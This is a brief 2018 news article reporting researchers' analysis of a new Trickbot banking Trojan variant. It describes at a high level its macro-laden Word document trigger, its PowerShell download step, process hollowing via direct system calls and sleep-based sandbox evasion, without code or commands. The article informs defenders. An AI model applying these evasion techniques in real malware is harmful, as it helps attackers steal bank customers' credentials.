Credential-Stealing Financial Trojan Targets Banks
Infosecurity Magazine | August 15, 2018
Financial institutions have long been the target of cyberattack, and today researchers at Cyberbit announced they have discovered a new variant of Trickbot, a modular malware and well-known financial Trojan that targets customers of large banks and steals their credentials. Since first discovered in 2016, new variants have emerged, updated with new tricks and modules. Researchers analyzed Trickbot’s most recent infection vector – a malicious Word document – that only executes its macro after a user has both clicked “enable content” and resized the window by zooming in and out of the document. Upon a user performing both of these functions, the macros execute a PowerShell that downloads and executes the Trickbot. Researchers noted that the variant leverages a variety of new evasion techniques, including a stealthy code-injection technique that performs process hollowing used for unpacking – as was seen in older samples of the Trickbot. With this variant, the process hollowing is done using direct system calls. In addition, by calling long/short sleeps, the malware sleeps for anywhere from 11 to 30 second and avoids sandboxes.